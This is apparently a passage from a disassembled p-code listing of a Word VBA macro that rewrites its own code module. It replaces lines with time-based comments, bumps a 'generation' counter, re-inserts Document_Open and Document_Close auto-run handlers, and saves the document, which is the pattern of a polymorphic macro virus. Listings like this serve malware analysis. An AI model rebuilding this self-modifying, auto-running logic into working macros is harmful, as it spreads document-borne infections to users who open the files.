' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set polyit
' Line #64:
' QuoteRem 0x0000 0x0001 "0"
' Line #65:
' Ld generation
' LitDI2 0x0001
' Add
' St temp_number
' Line #66:
' QuoteRem 0x0000 0x0001 "0"
' Line #67:
' StartWithExpr
' Ld polyit
' MemLd CodeModule
' With
' Line #68:
' QuoteRem 0x0000 0x0001 "0"
' Line #69:
' StartForVariable
' Ld da_line
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x01A4
' LitDI2 0x0002
' ForStep
' Line #70:
' QuoteRem 0x0000 0x0001 "0"
' Line #71:
' Ld da_line
' LitStr 0x0001 "'"
' Ld Now
' ArgsLd Second 0x0001
' Concat
' ArgsMemCallWith replaceline 0x0002
' Line #72:
' QuoteRem 0x0000 0x0001 "0"
' Line #73:
' StartForVariable
' Ld da_line
' EndForVariable
' NextVar
' Line #74:
' QuoteRem 0x0000 0x0001 "0"
' Line #75:
' LitDI2 0x00E6
' LitStr 0x0010 "Sub ToolsMacro()"
' ArgsMemCallWith replaceline 0x0002
' Line #76:
' QuoteRem 0x0000 0x0001 "0"
' Line #77:
' LitDI2 0x0102
' LitStr 0x001C "Private Sub Document_Close()"
' ArgsMemCallWith replaceline 0x0002
' Line #78:
' QuoteRem 0x0000 0x0001 "0"
' Line #79:
' LitDI2 0x0002
' LitStr 0x001B "Private Sub Document_Open()"
' ArgsMemCallWith replaceline 0x0002
' Line #80:
' QuoteRem 0x0000 0x0001 "0"
' Line #81:
' LitDI2 0x0006
' LitStr 0x000C "generation ="
' Ld temp_number
' Concat
' ArgsMemCallWith replaceline 0x0002
' Line #82:
' QuoteRem 0x0000 0x0001 "0"
' Line #83:
' EndWith
' Line #84:
' QuoteRem 0x0000 0x0001 "0"
' Line #85:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #86:
…
|
|||